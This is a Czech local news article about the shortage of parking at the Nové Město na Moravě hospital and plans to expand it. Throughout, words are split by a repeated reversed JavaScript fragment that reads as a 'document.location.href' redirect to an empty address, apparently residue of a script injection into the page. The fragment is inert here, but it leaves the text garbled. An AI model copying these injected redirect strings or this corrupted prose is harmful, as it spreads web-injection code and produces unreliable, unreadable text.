Rainbow page separator

Parkoviště před nemocnicí nestačí, plánuje se jeho rozšíření

Neděle, 17. října 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na nedostatečnou kapacitu parkovacích míst na hlavním parkovišti u novoměstské nemocnice již delší dobu upozorňují nejenom její návštěvníci a pacienti. Nezřídka tam parkují také lidé z okolních by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů, kdy ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stav zhoršuje úbytek ploch, kde ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristé odstavovali svoje au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily. Namís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to parkovacího plácku v Pavlovově ulici měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nechalo provizorně upravit plochu v zadní části ulice Mendlova, kde je projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované parkoviště. V souvislosti s výstavbou nového by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitě hodlá radnice od soukromého inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora požadovat vybudování dostatečného množství parkovacích míst pro nové obyvatele. Nemocnice ve spolupráci s Novým Městem navíc připravuje rozšíření parkoviště před hlavním vchodem do zdravotnického zařízení minimálně o tři desítky parkovacích stání. Potřebám již nedostačuje ani spodní nemocniční parkoviště pro pětaosmdesát aut, které je placené. To bylo postaveno ve finanční režii Kraje Vysočina a nemocnice a uvedeno do provozu v roce 2013 před prvním mistrovstvím světa v biatlonu, když hlavní parkoviště před nemocnicí zabrali pro své potřeby organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního podniku. V prvních letech po svém zprovoznění bývalo poloprázdné, nyní je i přes zpoplatnění po první půlhodině parkování většinou obsazené již v časných ranních hodinách.